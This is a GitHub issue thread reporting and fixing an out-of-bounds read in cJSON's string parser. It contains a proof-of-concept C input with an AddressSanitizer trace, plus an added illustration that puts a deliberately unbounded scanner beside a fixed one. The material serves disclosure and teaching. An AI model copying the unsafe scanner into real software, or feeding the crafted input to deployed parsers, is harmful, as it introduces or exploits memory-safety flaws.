cJSON buffer overflow with odd formatted JSON string #30

Closed
marcograss opened this issue Oct 1, 2016 · 3 comments

Comments

@marcograss

Hi,

I would like to report a buffer overflow in cJSON. You can test this PoC with an odd string:

#include <stdio.h>
#include <stdlib.h>
#include "cJSON.h"

/* Opening quote, 18 zeros, then a lone backslash: no escaped character
 * and no closing quote follow it, only the NUL terminator. */
static const char *my_json = "\"000000000000000000\\";

int main(int argc, const char * argv[]) {
    (void)argc;
    (void)argv;
    /* The out-of-bounds read is triggered inside cJSON_Parse (parse_string). */
    cJSON * root = cJSON_Parse(my_json);
    if (root == NULL) {
        printf("parse failed\n");
        return 1;
    }
    char * rendered = cJSON_Print(root);
    printf("%s\n", rendered ? rendered : "(null)");
    free(rendered);
    cJSON_Delete(root);
    return 0;
}

Building it with ASAN will trigger an out-of-bounds access on the input string, which can be problematic since in a lot of use cases the JSON input to applications using cJSON is untrusted.

Thanks

Marco

==72479==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001000138d5 at pc 0x0001000062fb bp 0x7fff5fbff2a0 sp 0x7fff5fbff298
READ of size 1 at 0x0001000138d5 thread T0
#0 0x1000062fa in parse_string cJSON.c:198
#1 0x100001a01 in parse_value cJSON.c:366
#2 0x1000015bb in cJSON_ParseWithOpts cJSON.c:334
#3 0x100001dfa in cJSON_Parse cJSON.c:343
#4 0x10000e481 in main main.c:17
#5 0x7fff834bb5ac in start (libdyld.dylib+0x35ac)

0x0001000138d5 is located 0 bytes to the right of global variable '' defined in '/Users/marco/Downloads/cjsontest/cjsontest/main.c:14:30' (0x1000138c0) of size 21
'' is ascii string '"000000000000000000'
SUMMARY: AddressSanitizer: global-buffer-overflow cJSON.c:198 in parse_string
Shadow bytes around the buggy address:
0x1000200026c0: 02 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x1000200026d0: 05 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x1000200026e0: 03 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x1000200026f0: 00 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9
0x100020002700: 03 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x100020002710: 04 f9 f9 f9 f9 f9 f9 f9 00 00[05]f9 f9 f9 f9 f9
0x100020002720: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
0x100020002730: 06 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x100020002740: 05 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x100020002750: 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x100020002760: 05 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==72479==ABORTING
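As an added illustration (example code written here, not cJSON's parser and not part of the original report): a minimal JSON string-literal scanner in the buggy shape the ASAN trace points at, next to a bounded version. The unsafe variant skips the byte after a backslash without examining it, so a literal that ends in a lone backslash steps over the terminating NUL and keeps reading; the hardened variant tests for NUL before every byte it consumes, including the escaped one, and rejects the report's input instead of reading past it. Function names and the sample inputs are constructed for this example.

```c
#include <stdio.h>
#include <stddef.h>

/* Constructed example, not cJSON's code. Both functions scan one JSON string
 * literal starting at in[0] == '"' and return the number of bytes it occupies
 * (both quotes included), or 0 if the literal is malformed. */

/* Buggy shape: the byte after a backslash is skipped without being examined,
 * so an input whose last byte is a backslash steps over the terminating NUL
 * and the loop keeps reading memory past the end of the string.
 * Only call this on well-formed input. */
size_t scan_string_unsafe(const char *in)
{
    const char *p = in + 1;
    while (*p != '"') {
        if (*p == '\\') {
            p++;               /* may land on the NUL terminator ... */
        }
        p++;                   /* ... and this steps past it */
    }
    return (size_t)(p - in) + 1;
}

/* Hardened shape: every byte is tested for NUL before it is consumed,
 * including the byte that follows a backslash. A literal that is
 * unterminated, or that ends in a lone backslash, is reported as malformed
 * instead of being read past its end. */
size_t scan_string_safe(const char *in)
{
    if (in == NULL || in[0] != '"') {
        return 0;
    }
    const char *p = in + 1;
    while (*p != '"') {
        if (*p == '\0') {
            return 0;          /* unterminated literal */
        }
        if (*p == '\\') {
            p++;
            if (*p == '\0') {
                return 0;      /* lone trailing backslash: the report's case */
            }
        }
        p++;
    }
    return (size_t)(p - in) + 1;
}

int main(void)
{
    /* The literal from the report: opening quote, 18 zeros, lone backslash. */
    static const char *reported = "\"000000000000000000\\";
    /* Constructed well-formed literal containing an escaped quote. */
    static const char *wellformed = "\"a\\\"b\"";

    printf("well-formed literal: %zu bytes (unsafe), %zu bytes (safe)\n",
           scan_string_unsafe(wellformed), scan_string_safe(wellformed));
    printf("reported literal: %zu (0 means rejected as malformed)\n",
           scan_string_safe(reported));
    return 0;
}
```

The practical check is the one the reporter used: build the parser and a harness like this with `-fsanitize=address -g`, feed it the literal from the report, and keep that input as a regression test so a future change to the escape handling cannot silently reintroduce the over-read.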

@FSMaxB FSMaxB added the bug label Oct 2, 2016
@FSMaxB
Collaborator

FSMaxB commented Oct 2, 2016

I can confirm this. Looking into it right now.

FSMaxB added a commit that referenced this issue Oct 2, 2016
@FSMaxB
Collaborator

FSMaxB commented Oct 2, 2016

Fixed via 94df772

@FSMaxB FSMaxB closed this as completed Oct 2, 2016
@FSMaxB FSMaxB mentioned this issue Oct 2, 2016
bmah888 added a commit to esnet/iperf that referenced this issue Oct 5, 2016
This is DaveGamble/cJSON#30, and fixes issue #466.

Signed-off-by: Bruce A. Mah <bmah@es.net>
@fgeek

fgeek commented Nov 7, 2016

@FSMaxB FSMaxB added the security label Nov 7, 2016
FSMaxB added a commit that referenced this issue May 1, 2017
5405313 Add tests for replacing the root document (#30)

git-subtree-dir: tests/json-patch-tests
git-subtree-split: 54053131a31241ecccfffdc79753ff169aa9763c
Floessie added a commit to RawTherapee/RawTherapee that referenced this issue Mar 27, 2018